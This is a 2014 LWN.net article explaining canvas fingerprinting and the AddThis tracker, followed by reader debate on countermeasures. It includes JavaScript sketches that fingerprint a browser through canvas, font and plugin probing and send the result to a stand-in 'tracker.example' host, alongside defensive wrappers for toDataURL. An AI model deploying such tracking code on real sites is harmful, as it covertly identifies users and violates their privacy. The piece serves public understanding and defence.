
Browser tracking through "canvas fingerprinting"


By Nathan Willis
July 23, 2014

Recently, public attention has been called to a new online user-tracking method that is purported to be nearly impossible to block. Called "canvas fingerprinting," the technique relies on forcing the browser to generate an image on the client side of the connection—an image that is unique enough to serve as a fingerprint for the browser that created it. In fact, the basis for this fingerprinting approach is several years old, but it does now seem to be in use in the wild. Whether or not it truly amounts to an insurmountable blocking challenge, however, remains to be seen.

ProPublica was among the first to report the discovery of the technique, in an article dated July 21. The tracker was discovered running on multiple high-traffic web sites, and was served by the web-tracking vendor AddThis. AddThis's user-visible feature is the appearance of click-and-share-this-link buttons that connect to various social-media services; the web-tracking function that accompanies said buttons is not advertised, of course.

The new tracker uses the HTML5 <canvas> element, telling the user's browser to draw a hidden image containing the text "Cwm fjordbank glyphs vext quiz" (a pangram in English, containing every letter of the alphabet). The text is rendered in the <canvas> element multiple times, in different colors and overlapping; differences in the graphics stacks of different computers will produce slightly different results. That, plus variations in browser-window size, text-rendering settings, and other variables, means that the resulting image, when rasterized, will exhibit a considerable amount of variation from one browser to the next. It can thus be sent back to the originating server (via the toDataURL() method) to serve as a fingerprint to track the browser across different sites and repeat visits.
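
For readers who want to see the moving parts, here is a minimal sketch of the technique as described above. The drawing parameters, the toy collection endpoint, and the decision to ship the full data: URL rather than a hash are illustrative assumptions, not AddThis's actual code:

    // A minimal sketch of canvas fingerprinting; parameters are illustrative.
    function canvasFingerprint() {
        var canvas = document.createElement('canvas');
        canvas.width = 400;
        canvas.height = 60;
        var ctx = canvas.getContext('2d');

        // Draw the pangram twice, overlapping and in different colors; font
        // rasterization differences end up in the resulting pixels.
        ctx.textBaseline = 'top';
        ctx.font = '14px Arial';
        ctx.fillStyle = '#f60';
        ctx.fillText('Cwm fjordbank glyphs vext quiz', 2, 2);
        ctx.fillStyle = 'rgba(102, 204, 0, 0.7)';
        ctx.fillText('Cwm fjordbank glyphs vext quiz', 4, 4);

        // Read the rendered pixels back as a data: URL; this string (or a
        // hash of it) is what gets reported as the fingerprint.
        return canvas.toDataURL();
    }

    // Hypothetical collection endpoint, for illustration only.
    new Image().src = 'https://tracker.example/collect?fp=' +
        encodeURIComponent(canvasFingerprint());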

Inquisitive users can visit the browserleaks.com page that tests <canvas> support to tell whether or not they are susceptible to this form of fingerprinting.

Although the AddThis fingerprinting tracker appears to be the first of its kind, the concept of canvas fingerprinting is not new. It was first described in detail in a 2012 paper written by Keaton Mowery and Hovav Shacham. The paper describes tests performed both with text rendering and by creating an image with WebGL. It goes into considerable detail about what parts of the browser and graphics stack contribute to differences in the resulting rendered image.

On the OpenGL side, the authors noted differences in the antialiasing algorithm, the interpolation of textures, and the illumination calculated for the OpenGL light source that is pointed at the image. In the text component, even though all text elements were rendered in the Arial font, there were discernible differences depending on the version of Arial used, the sub-pixel hinting, the spacing, and the antialiasing.

Ultimately, Mowery and Shacham estimated that their tests revealed an entropy of 5.73 bits, but noted that the tests were not sophisticated and that further refinement could yield better results. This is not an insignificant amount of entropy, but it is worth putting in context. The Panopticlick project from the Electronic Frontier Foundation (EFF) notes that the average browser fingerprint it observes contains 18.1 bits of entropy or more, which is enough to uniquely identify one browser out of roughly 280,000. An additional 5.73 bits pushes that number to one in 14.6 million.
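
Since those entropy figures are base-2 logarithms of population sizes, the arithmetic is easy to check; the back-of-the-envelope numbers below land in the same ballpark as the figures quoted above:

    // Entropy in bits is log2 of the number of equally likely possibilities,
    // so (assuming independence) separate sources of entropy simply add.
    var panopticlickAlone = Math.pow(2, 18.1);         // roughly 280,000
    var withCanvasBits    = Math.pow(2, 18.1 + 5.73);  // roughly 15 million
    console.log(Math.round(panopticlickAlone), Math.round(withCanvasBits));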

Thus, even the relatively modest entropy accounted for in Mowery and Shacham's research can constitute a real threat to individual privacy when it is used in conjunction with other techniques. But the AddThis canvas fingerprinting technique may have improved on the 2012 research in other ways. ProPublica attributed the discovery of the new AddThis tracker to a team of researchers at KU Leuven in Belgium and Princeton University in the United States. The team's findings have been published on the web, but the code and data have not yet been released, although the researchers have said they will be made public shortly.

On the other hand, assessing the real-world implications of this new flavor of web tracker requires determining how difficult it is to defeat. ProPublica titled its article on the find "Meet the Online Tracking Device That is Virtually Impossible to Block," but that would appear to overstate matters. Tor implemented a canvas-fingerprinting blocker in the Tor Browser Bundle in 2012. The EFF told MediaPost that its recent update to the Privacy Badger extension will block the AddThis tracker along with other social-media-based trackers. And commenters on many web articles about the find have also reported that the tracker can be defeated by the usual options like NoScript or by disabling JavaScript entirely.

The ProPublica article does mention tracker-blocking options in a sidebar, although it labels them with discouraging warnings like "can be slow" and "requires a lot of research and decision-making." Users who are attuned to the risks of browser tracking and the steps necessary to combat it may find such commentary objectionable. But then again, it is the "average user" who makes up the bulk of the population that AddThis and other web-tracking companies will be collecting data from. The reality, unfortunately, is that a great many users cannot or will not take steps to improve their privacy beyond whatever ships by default in the browser. Even if canvas fingerprinting fails to catch on, the contest to capture those users' movements through the web will undoubtedly just move on to the next user-tracking idea.



Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 18:57 UTC (Wed) by smoogen (subscriber, #97) [Link]

And as long as the majority of people do not protect their privacy, those who do remove data end up standing out with a fingerprint of their own, because what they remove can be just as trackable.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 23:04 UTC (Wed) by dashesy (guest, #74652) [Link]

Fortunately, the majority of people use increasingly generic and mass-produced machines; if all Chromebooks (of the same model) generate the same fingerprint, it surely won't be of any value.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 20:44 UTC (Tue) by Lennie (guest, #49641) [Link]

Yes, that was my idea as well.

Until I started thinking about it and later found this article too:
https://wiki.mozilla.org/Fingerprinting

Lots of fun things on that list, like:

- Clock skew measurements
- TCP stack (think: nmap)
- Scout Analytics provides software to fingerprint users based on typing cadence

I believe there are some 14 different Chromebook models now? Or even more.

So that is already a pretty big number. If you want to create a profile per user, you have to collect as much data as possible about the browser/machine/user and try to combine different browsing sessions that look like they are probably the same.

Now start with something simple: users at home, not using Tor and without a browser extension installed to block JavaScript. Take those 14 different Chromebook models and combine that with the IP address or IP-address block from the ISP. Even a dynamic IP address is probably per region.

Pretty much everyone has their cable/DSL connection to the Internet up 24/7, right? So how often do you think your IP address changes? Somewhere between maybe once every few weeks and, more likely, once every few months.

The GPU and the IP address don't usually change at the same time.

How many people use the same or a very similar GPU in your immediate region?

Do you still think that, based only on these items, you would not be able to combine some number of browsing sessions?

And these are only 2 variables, of which there are many; have another look at the link above from Mozilla.

But that list isn't even complete; they can combine it with:
- website visited (many people have sites they regularly visit)

- the search query when the 'referer' is a search engine; people search for the same things when visiting different websites (not as common anymore, because more search engines use HTTPS, which means no more referer information is available)

I'm sure there are many more.

Browser tracking through "canvas fingerprinting"

Posted Jul 30, 2014 21:17 UTC (Wed) by dashesy (guest, #74652) [Link]

I think you are right. Another vector I did not see in that link is that most users have more than one machine; it is enough to identify the connection once, and afterwards they can track you even after you change one machine. And even if you install all sorts of plugins on your PC, you may have a harder time (or less inclination to do likewise) with the default browser on a cellphone.

Browser tracking through "canvas fingerprinting"

Posted Jul 30, 2014 22:00 UTC (Wed) by Lennie (guest, #49641) [Link]

I'm a Firefox user, with Firefox Sync (which encrypts everything before uploading). I know it uploads bookmarks, history, saved passwords, and information about currently open windows/tabs; no cookies or local storage.

But does anyone know what Chrome does? Does it sync cookies? If so, that would make it a lot easier to track people.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 19:02 UTC (Wed) by mathstuf (subscriber, #69389) [Link]

How much do things like RequestPolicy help with this since no site is allowed to force me to connect to another without permission? I guess having them proxy it back through the original site's server would fix it, but then that means changing ad networks requires changing your web server's configuration.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 19:52 UTC (Tue) by Lennie (guest, #49641) [Link]

This solves it.

The tracking you should be most "afraid" of is the cross-site kind, which usually uses other domains.

So yes, something like RequestPolicy solves it.

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 21:20 UTC (Tue) by mathstuf (subscriber, #69389) [Link]

That's good. I think the only things I'm missing from RequestPolicy are wildcard whitelisting (e.g., sites using cdnX.foobar.com) and auditing (a Lightbeam-like interface for what *would* have happened without it, as far as I can tell at least; deep links would be lost, understandably).

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 19:08 UTC (Wed) by MegabytePhreak (guest, #60945) [Link]

It's not clear to me that the data that this technique generates is really orthogonal to the data that panopticlick collects. If the majority of the 5.73 bits (or however many are actually extractable) identify the browser and the OS, then that doesn't really add anything to the total fingerprint information content, since panopticlick can get that from the user agent.

From what I can tell, the biggest fingerprinting information leaks seem to be the installed system fonts and the list of installed plugins. Now that we have WebFonts, maybe browsers should only expose a limited, fixed subset of system fonts. Of course, this information is also leaked by Flash and Java.
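
For the curious, both of the leaks mentioned here are reachable from ordinary page script. The sketch below uses the standard navigator.plugins array plus the common width-measurement trick for font detection; the probed font list is just an example:

    // Enumerate installed plugins (a standard, if privacy-hostile, API).
    var pluginNames = Array.prototype.map.call(navigator.plugins, function (p) {
        return p.name;
    }).join(',');

    // Detect an installed font by comparing rendered text width against a
    // generic fallback; a differing width means the named font was used.
    function hasFont(name) {
        var ctx = document.createElement('canvas').getContext('2d');
        ctx.font = '72px monospace';
        var fallbackWidth = ctx.measureText('mmmmmmmmmmlli').width;
        ctx.font = '72px "' + name + '", monospace';
        return ctx.measureText('mmmmmmmmmmlli').width !== fallbackWidth;
    }

    var fontList = ['Arial', 'Calibri', 'DejaVu Sans'].filter(hasFont).join(',');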

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:03 UTC (Wed) by jimparis (subscriber, #38647) [Link]

> From what I can tell, the biggest fingerprinting information leaks seem to be the installed system fonts and the list of installed plugins. Now that we have WebFonts, maybe browsers should only expose a limited, fixed subset of system fonts.

See the linked 2012 paper. Browsers differ even in how they render identical WebFonts. But the biggest fingerprinting information leak, based on the entropies estimated in that paper, was WebGL rendering (presumably because it is affected by the browser, operating system, drivers, chipset, etc.).

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:29 UTC (Wed) by MegabytePhreak (guest, #60945) [Link]

I guess my point of view is that being able to identify the browser and OS isn't necessarily something that can be prevented, but being able to identify an individual user (as the set of installed fonts+plugins is apparently often able to do according to the panopticlick data) is a problem.

As far as WebGL goes, that's a whole nother kettle of fish that I don't really have a solution for (other than being able to turn it off).

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 6:10 UTC (Thu) by epa (subscriber, #39769) [Link]

It would help for rendering to a canvas (rather than directly to the screen) to be done in software. Many of the small rendering differences are due to hardware acceleration.

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 12:36 UTC (Thu) by roc (subscriber, #30627) [Link]

Unfortunately, "don't use the GPU" is not viable for many applications (games).

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 15:31 UTC (Thu) by rahvin (subscriber, #16953) [Link]

Isn't the fix for this to allow the browser to notify the user, or to let the user ban the transfer of data back to the server? It seems to me that it's the toDataURL method that is causing the problem, and it has been one of the major problems with the interactive web.

First they added scripting that allowed remote servers to run executable scripts on the user's PC; now, with these extensions, they are allowing those scripts to send generated data back to the server. That's scary and should be completely user-controllable, if not outright disabled. I want to know every single time a server requests data from my computer, particularly data it had my computer create, and to be able to reject the request.

That this feature to send data from the local computer to the server even exists presents all kinds of security vulnerabilities. I realize I don't know every possible use of this feature, and there could be some compelling use case, but the security risks far outweigh the benefits. Combined with a root exploit and a browser exploit, you could use this to send any data back to the server in a way that most IDSes or packet-inspection systems would miss, because it looks like standard web traffic.

Maybe I'm just paranoid, but after installing things like Ghostery, RequestPolicy, and NoScript you come to realize just how much information web sites share with these black-hole data-collection services, which have little to no privacy policy and every incentive to collect every single detail of your life in a database.

I'd like to encourage Firefox to either create an extension or add an option to approve such data transfers, or to disable that method entirely.

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 19:24 UTC (Thu) by mathstuf (subscriber, #69389) [Link]

Could you monkey patch[1] toDataURL to pop up an alert() and return an empty string on denial (a sketch follows below)? Even better if you can save a "userAuthorized" flag per caller. The problem is that it has uses other than this, and the function definitely doesn't have knowledge of what is done with the return value :( .

[1]I like Python's term "duck punching" for this. Is there a special term for JS? "Pollock coding" seems apt?
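
A rough sketch of the wrapper being described, as it might appear in a userscript or extension content script; the confirm() wording is an assumption, and, as chax points out further down, a page can undo a naive patch like this one:

    (function () {
        var realToDataURL = HTMLCanvasElement.prototype.toDataURL;
        HTMLCanvasElement.prototype.toDataURL = function () {
            // Deny: hand back an empty string instead of the rendered pixels.
            if (!window.confirm('Allow this page to read canvas contents?')) {
                return '';
            }
            return realToDataURL.apply(this, arguments);
        };
        // getImageData() would need the same treatment to close the other
        // read-back path.
    })();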

Browser tracking through "canvas fingerprinting"

Posted Jul 24, 2014 20:29 UTC (Thu) by jimparis (subscriber, #38647) [Link]

Don't know about monkey patching it, but the Tor browser project uses a Firefox patch that requires user confirmation before Javascript can extract data from a canvas element: https://trac.torproject.org/projects/tor/ticket/6253

Browser tracking through "canvas fingerprinting"

Posted Aug 3, 2014 4:31 UTC (Sun) by chax (guest, #52122) [Link]

It is certainly possible to do some sort of "monkey-patching" through a userscript, unless the person operating a website knows that you may do it.

Monkey-patching of core functions can be easily overridden by using a delete statement. Consider the following fragment:

> HTMLDocument.prototype.getElementById
< function getElementById() { [native code] }
> HTMLDocument.prototype.getElementById = null
< null
> HTMLDocument.prototype.getElementById
< null
> delete HTMLDocument.prototype.getElementById
< true
> HTMLDocument.prototype.getElementById
< function getElementById() { [native code] }
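
That works because the assignment only shadows the native method with an ordinary, configurable property. A userscript that wants its wrapper to survive the delete trick can (hedging for differences between engines) define it as non-configurable and non-writable, so the page can neither reassign nor delete its way back to the native function; a fresh copy could still be fished out of a newly created iframe, so this is not airtight:

    (function () {
        var nativeToDataURL = HTMLCanvasElement.prototype.toDataURL;
        Object.defineProperty(HTMLCanvasElement.prototype, 'toDataURL', {
            value: function () {
                return window.confirm('Allow canvas read-out?')
                    ? nativeToDataURL.apply(this, arguments)
                    : '';
            },
            writable: false,      // assignment can no longer replace the wrapper
            configurable: false,  // delete can no longer remove it
            enumerable: true
        });
    })();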

Browser tracking through "canvas fingerprinting"

Posted Jul 25, 2014 7:13 UTC (Fri) by roc (subscriber, #30627) [Link]

In reality most users have no ability to make these kinds of decisions. Even people who have the ability quickly develop habits of clicking through such warnings. So user notification and confirmation is not a realistic solution for the mass market (and the mass market is what we care about, since they need protection as much as anyone).

Blocking Web page scripts from communicating with servers is nigh impossible. For example you'd have to disable subresource loads, e.g. scripted image loads.

Disabling fetching of canvas pixels blocks all kinds of use-cases, e.g. image editors.

These are hard problems.

Browser tracking through "canvas fingerprinting"

Posted Jul 25, 2014 7:18 UTC (Fri) by dlang (subscriber, #313) [Link]

Block the browser from uploading this canvas, and the next step will be to put the analysis of the fingerprint into the JavaScript, to run in the browser; then the JavaScript can download image fingerprint0x01.jpg, etc. (sketch below).

You can't prevent the browser from communicating with the server by fetching things, or you break the purpose of the browser.
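
A sketch of the scenario described here: the page script reduces the rendered pixels to a short identifier locally and leaks it through an ordinary-looking image fetch. The toy hash and the file-name pattern are only for illustration:

    // Toy 32-bit hash, standing in for whatever digest a real tracker would use.
    function toyHash(s) {
        var h = 0;
        for (var i = 0; i < s.length; i++) {
            h = (h * 31 + s.charCodeAt(i)) >>> 0;
        }
        return h.toString(16);
    }

    var c = document.createElement('canvas');
    var ctx = c.getContext('2d');
    ctx.font = '14px Arial';
    ctx.fillText('Cwm fjordbank glyphs vext quiz', 2, 2);

    // Analyze the pixels client-side instead of uploading them...
    var pixels = ctx.getImageData(0, 0, c.width, c.height).data;
    var fp = toyHash(Array.prototype.join.call(pixels, ','));

    // ...then "download" an image whose name carries the result. To the
    // network, it looks like any other subresource load.
    new Image().src = 'https://tracker.example/fingerprint-' + fp + '.jpg';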

Browser tracking through "canvas fingerprinting"

Posted Jul 29, 2014 20:02 UTC (Tue) by Lennie (guest, #49641) [Link]

The better solution is to do software rendering to canvas/WebGL by default and have a browser API that the JavaScript code can use to ask the user for speedy rendering, which would then be used when playing games, doing online image editing, or whatever.

Just like with the Geolocation API: "Would you like to share your location with domainname?"

What the text of that message should be I'm not going to speculate for now. :-)
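
The Geolocation API already works this way, with the browser interposing a permission prompt; a canvas/WebGL analog would be new API surface, so the second half of this sketch is purely hypothetical:

    // Real API: the browser asks the user before handing the position to the page.
    navigator.geolocation.getCurrentPosition(
        function (pos) { console.log(pos.coords.latitude, pos.coords.longitude); },
        function (err) { console.log('denied or unavailable: ' + err.message); }
    );

    // Hypothetical analog (no such API exists): default to deterministic
    // software rendering, and let a page ask, via a prompt, for GPU rendering.
    // canvas.requestAcceleratedRendering().then(function (granted) {
    //     // fall back to software rendering if the user says no
    // });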

Browser tracking through "canvas fingerprinting"

Posted Jul 31, 2014 11:17 UTC (Thu) by oldtomas (guest, #72579) [Link]

> Isn't the fix for this to allow the browser to notify the user, or for the user to ban the transfer of data back to the server? It would seem to me it's the datatourl tag that appears to be causing the problem and has been one of the major problems with the interactive web.

Unfortunately no. It's possible for the browser to send data by issuing a plain old GET request. The URL (and the request headers!) provide ample space for that.

The horse left the barn a long time ago, by allowing (and nowadays nigh forcing) the user agent to execute $RANDOM_CODE off the 'net. Except for the very stubborn.

Browser tracking through "canvas fingerprinting"

Posted Jul 28, 2014 16:44 UTC (Mon) by epa (subscriber, #39769) [Link]

Right, but most games will render directly to the screen, surely? Not to a canvas object that is kept off-screen and only queried from JavaScript. So when you create a canvas, you should choose between (a) an accelerated one, which is fast but whose contents you can't later query, and (b) a software-rendered one, which will be pixel-for-pixel the same in all browsers and can be queried from JavaScript, but is slower.
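
No such knob exists in the canvas API, but the split described here could plausibly be expressed as a context-creation attribute; the 'accelerated' option below is hypothetical and purely illustrative:

    // (a) Hypothetical: an accelerated canvas, fast, but whose read-back
    //     methods (toDataURL(), getImageData()) would be refused.
    var fastCtx = document.createElement('canvas')
        .getContext('2d', { accelerated: true });

    // (b) Hypothetical: a software-rendered canvas, pixel-for-pixel identical
    //     across machines, and therefore safe to let scripts read back.
    var softCtx = document.createElement('canvas')
        .getContext('2d', { accelerated: false });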

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:05 UTC (Wed) by rgmoore (✭ supporter ✭, #75) [Link]

It's not clear to me that the data that this technique generates is really orthogonal to the data that panopticlick collects.

This is exactly what I thought when reading that. It's a new way of getting the browser to leak information but not a new set of information being leaked.

Tracking? More like snooping!

Posted Jul 23, 2014 20:23 UTC (Wed) by proski (subscriber, #104) [Link]

A browser sending data from my screen? That's creepy! How would anyone use it for legitimate purposes? OK, maybe it's used to implement an online graphics editor. But then the browser should ask for permission before sending my canvas to the server.

Tracking? More like snooping!

Posted Jul 23, 2014 20:55 UTC (Wed) by lambda (subscriber, #40735) [Link]

That's exactly the solution that the Tor browser went with for blocking this attack; prompting you before allowing JavaScript to extract any data from canvas.

Tracking? More like snooping!

Posted Jul 24, 2014 2:44 UTC (Thu) by josh (subscriber, #17465) [Link]

<canvas> has numerous uses, and the ability to turn a <canvas> into an image does as well. For instance, consider a shared sketchboard, or a web-based image editor.

Browser tracking through "canvas fingerprinting"

Posted Jul 23, 2014 20:31 UTC (Wed) by alkbyby (subscriber, #61687) [Link]

I think that merely adding the fingerprinting bits is likely incorrect. Most likely there's a very strong correlation between Panopticlick fingerprints and canvas fingerprints. I won't be surprised if combining those fingerprints doesn't grow the entropy at all.

Using several browsers. +1 for diversity

Posted Jul 24, 2014 12:56 UTC (Thu) by ber (subscriber, #2142) [Link]

A simple protection measure is to use several Free Software browsers for daily tasks. Its effect is very small, of course, but it can be done by everyone without hassle.

Using several browsers. +1 for diversity

Posted Jul 24, 2014 14:32 UTC (Thu) by mpr22 (subscriber, #60784) [Link]

Under my scheme of classification, using more than one web browser falls into the category "hassle" in much the same way that using more than one text editor, using more than one mail client, or using more than one command-line interpreter would.

Using several browsers. +1 for diversity

Posted Jul 25, 2014 20:18 UTC (Fri) by Jandar (subscriber, #85683) [Link]

Instead of changing the whole browser one could change some of the data used for fingerprinting.

On every browser start, randomly drop a few fonts or plugins or whatever; only those unused for x days and not pinned by the user.

Introduce fudge factors into the graphics primitives to create a kind of changing rounding error, invisible to normal human eyes but deflecting this canvas fingerprinting (see the sketch after this comment).

Every time some piece of data varies between users but is constant in time, create a slight variance per browser invocation. There could be a kind of plugin architecture to randomly patch the various data sets.
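
A sketch of what the fudge-factor idea could look like if implemented in the browser or a privileged extension: the read-back path is wrapped so that every pixel gets a tiny error that is fixed for the lifetime of the session (so it cannot be averaged away within the session) but differs from one startup to the next. The wrapping point and the seeded noise function are assumptions; toDataURL() would need the same treatment:

    (function () {
        var sessionSeed = Date.now() >>> 0;   // stand-in for a per-startup random seed

        // Deterministic for a given (seed, position, channel): returns -1, 0, or +1.
        function noise(x, y, channel) {
            var h = (sessionSeed ^ (x * 73856093) ^ (y * 19349663) ^
                     (channel * 83492791)) >>> 0;
            return (h % 3) - 1;
        }

        var realGetImageData = CanvasRenderingContext2D.prototype.getImageData;
        CanvasRenderingContext2D.prototype.getImageData = function (sx, sy, sw, sh) {
            var img = realGetImageData.apply(this, arguments);
            for (var y = 0; y < sh; y++) {
                for (var x = 0; x < sw; x++) {
                    for (var c = 0; c < 3; c++) {   // leave the alpha channel alone
                        var i = (y * sw + x) * 4 + c;
                        // Uint8ClampedArray clamps out-of-range values for us.
                        img.data[i] = img.data[i] + noise(sx + x, sy + y, c);
                    }
                }
            }
            return img;
        };
    })();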

Using several browsers. +1 for diversity

Posted Jul 26, 2014 6:57 UTC (Sat) by alankila (guest, #47141) [Link]

All of these are horrible solutions.

- dropping plugins does nothing to stop fingerprinting because plugins are not needed for this hack, and if you allow any font to be pinned, then there will exist a pinned font that can be used for fingerprinting. (Remember, discovering which fonts are pinned is itself fingerprinting information.) In addition, there exist fonts that no sane person will disable. For instance, renderings of Arial are sufficient to perform the fingerprinting, and it is an extremely common font in wide use.

- random errors fall prey to simple analysis methods such as averaging or taking the median of multiple sample images. Systematic errors that vary slowly in time, however, could work. The fingerprinting used an optics test image with geometric distortion, which produces all sorts of interesting moiré that depends on the antialiasing implementation. I suppose it would be possible to perturb the vertex coordinates slightly to change the moiré pattern enough to prevent fingerprinting, but I bet this would be user-visible, as the differences between implementations did not look very subtle to me.

I personally like dithering, and every time I write a graphics program that renders some floating-point-valued image with more than 8 bits of precision per component, I convert to sRGB in floating point and then truncate to 8 bits with triangular dither. This type of dither generates uniform noise across the entire image, and of course it could be averaged out one way or another. However, any random noise thwarts efficient fingerprinting mechanisms that just take a single image, hash it to a short string, and send it to the server as the fingerprint...
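
For the curious, the quantization step described here looks roughly like the following; TPDF ("triangular probability density function") dither is the sum of two uniform random values, and the exact scaling conventions vary, so treat this as a sketch:

    // Quantize a floating-point sRGB channel value in [0, 1] down to 8 bits,
    // adding triangular dither (sum of two uniforms, spanning about +/- 1 LSB).
    function ditherTo8Bit(value01) {
        var dither = (Math.random() - 0.5) + (Math.random() - 0.5);
        var v = Math.round(value01 * 255 + dither);
        return Math.max(0, Math.min(255, v));
    }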

Using several browsers. +1 for diversity

Posted Jul 26, 2014 9:27 UTC (Sat) by Jandar (subscriber, #85683) [Link]

> dropping plugins does nothing to stop fingerprinting because plugins are not needed for this hack,

The list of installed plugins is a major part of Panopticlick's fingerprinting.

> and if you allow any font to be pinned, then there will exist a pinned font that can be used for the fingerprinting purpose. (Remember, discovering which font is pinned is alone fingerprinting information.)

It's obvious that this pinning has to be unobservable by the web server. After the startup of the browser, there is no information left about the fudging of the configuration.

> In addition, there exist fonts no sane person will disable.

If everyone has this font, it can't be used for fingerprinting. So what?

> For instance, renderings of Arial are sufficient to perform the fingerprinting and it is an extremely common font in wide use.

To counter this, my suggestion was to introduce very small, subtle errors into the graphics primitives, which change with every browser invocation.

> - random errors fall prey to simple analysis methods such as averaging or taking median between multiple sample images.

To perform averaging over many browser invocations, they have to identify the user beforehand. If they have other means to identify the user, this whole fingerprinting is unnecessary for them.

None of the random changes are made during a browser session; all must be made at startup.

Using several browsers. +1 for diversity

Posted Jul 27, 2014 15:26 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

> None of the random changes are done during a browser session, all must be made on startup

Seeing as browsers these days have the same lifetime as a computer's uptime, is this enough? Maybe once a day or week instead?

Using several browsers. +1 for diversity

Posted Jul 27, 2014 21:20 UTC (Sun) by Jandar (subscriber, #85683) [Link]

If fingerprinting is done within an open tab, it could be repeated and the new fingerprint would be linked to the old one.

If someone is privacy-minded, a restart of the browser isn't too much to ask. The new invocation could retain the same URIs in its tabs as the previous one (can a tab get information about other tabs?).

Using several browsers. +1 for diversity

Posted Jul 27, 2014 22:46 UTC (Sun) by mathstuf (subscriber, #69389) [Link]

> If someone is privacy-minded a restart of the browser isn't to much to ask.

What would you recommend for a typical session length then? Why not just reset it on that schedule (jittered around so that the schedule itself isn't a fingerprint) automatically?

> can a tab get information about other tabs?

Sounds like a bug in the browser (information leak).

Using several browsers. +1 for diversity

Posted Jul 28, 2014 0:02 UTC (Mon) by Jandar (subscriber, #85683) [Link]

> What would you recommend for a typical session length then? Why not just reset it on that schedule (jittered around so that the schedule itself isn't a fingerprint) automatically?

No changing of anything in any running tab if the tabs share the random parameters. Even if the tabs have different parameters, re-randomizing within a tab is a bad idea, because averaging or building a common super-/subset would be possible. It is probably beneficial to use the same randomization for any tab/window opened from another, because they are linked, e.g. through the referer.

The simplest and surest thing would be to randomize on every browser start. More convenient for long-lived sessions would be separate randomization in different tabs, but that is probably many orders of magnitude more difficult. An infrastructure that gives each tab a different view of central information can't be easy ;-).

If I had to do it for myself, I would create a container/VM from a snapshot and change the filesystem before browser start: using a few versions of several libraries, multiple versions of fonts (perhaps differently compiled versions of the rendering libraries would be sufficient), deleting fonts/plugins/... (some installed especially so they can be removed), tweaking the browser ID, and so on. I have no skill or experience with browser programming, so this would be my fill-in.

If some of the folks working on Firefox were to do FCM (Fingerprint Counter Measures), they could do it vastly better.


Copyright © 2014, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license